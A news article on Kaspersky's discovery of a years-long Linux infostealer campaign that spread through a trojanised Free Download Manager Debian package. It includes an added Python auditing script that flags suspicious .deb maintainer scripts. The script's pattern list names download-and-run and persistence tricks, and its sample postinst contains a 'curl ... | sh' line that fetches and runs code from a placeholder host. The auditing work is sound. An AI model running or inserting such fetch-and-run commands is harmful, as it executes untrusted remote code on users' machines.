An infostealing malware campaign has been underway for at least three years, going completely unnoticed, Russian cybersecurity firm Kaspersky has revealed.
The finding came after the company decided to take a closer look at the growing number of Linux-based attacks, which “can operate for years without being noticed by the cybersecurity community.”
This particular case involves what appears to be a Debian package of a free download manager, which has been available in its malicious form since January 2020.
Debian download manager malware
Affected versions of the package contain a malicious postinst script, a Debian maintainer script that runs automatically when the package is installed, which the analysts say contains comments in both Russian and Ukrainian.
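That detail is also the defender's opportunity: the maintainer scripts of any third-party .deb can be extracted and read before dpkg ever runs them. The script below is an added example, not code from the article, from Kaspersky, or from the Free Download Manager project. It parses the .deb container directly (an ar archive wrapping control.tar) so it needs only Python and no dpkg-deb, lists the preinst/postinst/prerm/postrm scripts, and flags lines matching a small list of patterns. The pattern list, the in-memory sample package it builds, and the example.invalid host are all constructed for illustration and are not taken from the real campaign.

```python
"""Extract and audit the maintainer scripts of a .deb before installing it.

A .deb is an `ar` archive holding `debian-binary`, `control.tar.*` (control
file plus maintainer scripts) and `data.tar.*` (the installed files). dpkg
runs the maintainer scripts as root during install, so read them first.
"""
import io
import re
import tarfile

MAINTAINER_SCRIPTS = {"preinst", "postinst", "prerm", "postrm"}

# Constructed list of patterns worth a second look in an install script.
SUSPICIOUS = {
    "download-and-run": re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),
    "base64-decode": re.compile(r"base64\s+(-d|--decode)"),
    "cron-persistence": re.compile(r"\bcrontab\b|/etc/cron"),
    "hidden-path": re.compile(r"(/var/tmp|/tmp)/\.[A-Za-z0-9_]+"),
}


def ar_members(blob: bytes):
    """Yield (name, data) for each member of an `ar` archive (60-byte headers)."""
    if not blob.startswith(b"!<arch>\n"):
        raise ValueError("not an ar archive")
    pos = 8
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]
        if hdr[58:60] != b"`\n":
            raise ValueError("corrupt ar header")
        name = hdr[0:16].decode().rstrip().rstrip("/")  # GNU ar may append '/'
        size = int(hdr[48:58].decode().strip())
        yield name, blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)  # members are padded to even offsets


def maintainer_scripts(deb: bytes) -> dict:
    """Return {script_name: text} for every maintainer script in the package."""
    scripts = {}
    for name, data in ar_members(deb):
        if not name.startswith("control.tar"):
            continue
        with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
            for member in tar.getmembers():
                base = member.name.lstrip("./")
                if member.isfile() and base in MAINTAINER_SCRIPTS:
                    text = tar.extractfile(member).read()
                    scripts[base] = text.decode("utf-8", "replace")
    return scripts


def audit(deb: bytes) -> dict:
    """Map each maintainer script to a list of (pattern, line_no, line) hits."""
    findings = {}
    for name, text in maintainer_scripts(deb).items():
        hits = []
        for lineno, line in enumerate(text.splitlines(), 1):
            for label, rx in SUSPICIOUS.items():
                if rx.search(line):
                    hits.append((label, lineno, line.strip()))
        findings[name] = hits
    return findings


def build_deb(postinst: str) -> bytes:
    """Assemble a minimal .deb in memory (constructed sample, not a real package)."""
    control = io.BytesIO()
    with tarfile.open(fileobj=control, mode="w:gz") as tar:
        meta = "Package: sample\nVersion: 1.0\nArchitecture: all\n"
        for fname, body in (("control", meta), ("postinst", postinst)):
            info = tarfile.TarInfo("./" + fname)
            data = body.encode()
            info.size, info.mode = len(data), 0o755
            tar.addfile(info, io.BytesIO(data))
    data_tar = io.BytesIO()
    with tarfile.open(fileobj=data_tar, mode="w:gz"):
        pass  # empty payload is enough for the audit
    members = [("debian-binary", b"2.0\n"),
               ("control.tar.gz", control.getvalue()),
               ("data.tar.gz", data_tar.getvalue())]
    out = bytearray(b"!<arch>\n")
    for name, body in members:
        # name(16) mtime(12) uid(6) gid(6) mode(8) size(10) fmag(2)
        hdr = f"{name:<16}{0:<12}{0:<6}{0:<6}{0o100644:<8o}{len(body):<10}`\n"
        out += hdr.encode() + body + (b"\n" if len(body) % 2 else b"")
    return bytes(out)


# Constructed postinst mixing harmless lines with two that should be flagged.
SAMPLE_POSTINST = """#!/bin/sh
set -e
# constructed example of the kind of line worth flagging
mkdir -p /var/tmp/.u
curl -s http://example.invalid/x | sh
exit 0
"""

if __name__ == "__main__":
    for script, hits in audit(build_deb(SAMPLE_POSTINST)).items():
        print(script, "->", hits or "no findings")
```

For a real package on disk, read the file into `deb` and call `audit(deb)`; an empty hit list is not a clean bill of health, only the absence of the listed patterns, so the extracted text itself is still worth reading in full.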
After downloading and installing an infected version of the software for further investigation, Kaspersky’s researchers found that it deploys a Bash stealer that collects system information, browsing history, saved passwords, cryptocurrency wallet files, and credentials for cloud services, specifically AWS, Google Cloud, Oracle Cloud Infrastructure and Azure.
Fortunately, the researchers also revealed how the malicious version of the software had been distributed. They confirmed that the official website and its content had not been compromised; instead, links to the infostealing version had been posted to online communities such as Reddit and StackOverflow over a period of around two years.
The genuine makers of Free Download Manager have since been notified by Kaspersky, though at the time of writing, they had not responded.
According to Kaspersky, the threat actor targeted Linux machines specifically because they are analyzed much less often than Windows and macOS devices, simply because they are less widely used.
Still, there are some very easy steps users can take to protect themselves online. Most importantly, only download software from legitimate sources, and check details such as domains and email addresses against what has been verified as legitimate. Doing so would have spared the victims of this malware.